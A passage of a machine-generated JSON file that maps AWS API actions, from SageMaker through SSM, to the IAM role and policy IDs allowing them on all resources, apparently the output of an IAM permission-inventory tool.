{"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listUserProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listWorkteams": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sdb:*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"sdb:BatchPutAttributes": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"sdb:Select": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"sdb:domainMetadata": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sdb:listDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"secretsmanager:describeSecret": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"secretsmanager:getResourcePolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"secretsmanager:listSecretVersionIds": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"secretsmanager:listSecrets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:getEnabledStandards": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:getFindings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:getInsightResults": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:getInsights": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:getMasterAccount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:getMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:listEnabledProductsForImport": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:listInvitations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"securityhub:listMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describeConstraint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describePortfolio": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describeProduct": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describeProductAsAdmin": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describeProductView": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describeProvisioningArtifact": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describeProvisioningParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:describeRecord": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listAcceptedPortfolioShares": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listConstraintsForPortfolio": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listLaunchPaths": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listPortfolioAccess": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listPortfolios": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listPortfoliosForProduct": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listPrincipalsForPortfolio": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listProvisioningArtifacts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:listRecordHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:scanProvisionedProducts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicecatalog:searchProducts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:getAWSDefaultServiceQuota": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:getAssociationForServiceQuotaTemplate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:getRequestedServiceQuotaChange": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:getServiceQuota": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:getServiceQuotaIncreaseRequestFromTemplate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:listAWSDefaultServiceQuotas": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:listRequestedServiceQuotaChangeHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:listRequestedServiceQuotaChangeHistoryByQuota": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:listServiceQuotaIncreaseRequestsInTemplate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:listServiceQuotas": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"servicequotas:listServices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:GetSendQuota": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ses:describeActiveReceiptRuleSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:describeReceiptRule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:describeReceiptRuleSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getAccount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getBlacklistReports": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getConfigurationSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getConfigurationSetEventDestinations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getDedicatedIp": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getDedicatedIps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getDeliverabilityDashboardOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getDeliverabilityTestReport": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getDomainDeliverabilityCampaign": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getDomainStatisticsReport": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getEmailIdentity": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getIdentityDkimAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getIdentityMailFromDomainAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getIdentityNotificationAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getIdentityPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getIdentityVerificationAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getSendQuota": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:getSendStatistics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listConfigurationSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listDedicatedIpPools": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listDeliverabilityTestReports": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listDomainDeliverabilityCampaigns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listEmailIdentities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listIdentities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listIdentityPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listReceiptFilters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listReceiptRuleSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ses:listVerifiedEmailAddresses": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"shield:describeAttack": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"shield:describeProtection": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"shield:describeSubscription": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"shield:listAttacks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"shield:listProtections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sms-voice:getConfigurationSetEventDestinations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sms:getConnectors": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sms:getReplicationJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sms:getReplicationRuns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sms:getServers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"snowball:describeAddress": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"snowball:describeAddresses": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"snowball:describeJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"snowball:getSnowballUsage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"snowball:listJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"sns:checkIfPhoneNumberIsOptedOut": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:getEndpointAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:getPlatformApplicationAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:getSMSAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:getSubscriptionAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:getTopicAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:listEndpointsByPlatformApplication": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:listPhoneNumbersOptedOut": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:listPlatformApplications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:listSubscriptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:listSubscriptionsByTopic": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sns:listTopics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sqs:*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"sqs:CreateQueue": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"sqs:Delete*": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"sqs:GetQueue*": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"sqs:ListQueues": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"sqs:PurgeQueue": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"sqs:ReceiveMessage": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"sqs:getQueueAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sqs:getQueueUrl": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sqs:listDeadLetterSourceQueues": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sqs:listQueues": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeActivations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeAssociation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeAssociationExecutionTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeAssociationExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeAutomationExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeAutomationStepExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeAvailablePatches": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeDocument": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeDocumentPermission": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeEffectiveInstanceAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeEffectivePatchesForPatchBaseline": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeInstanceAssociationsStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeInstanceInformation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeInstancePatchStates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeInstancePatchStatesForPatchGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeInstancePatches": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeInventoryDeletions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindowExecutionTaskInvocations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindowExecutionTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindowExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindowSchedule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindowTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindowTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindows": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeMaintenanceWindowsForTarget": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describePatchBaselines": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describePatchGroupState": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": 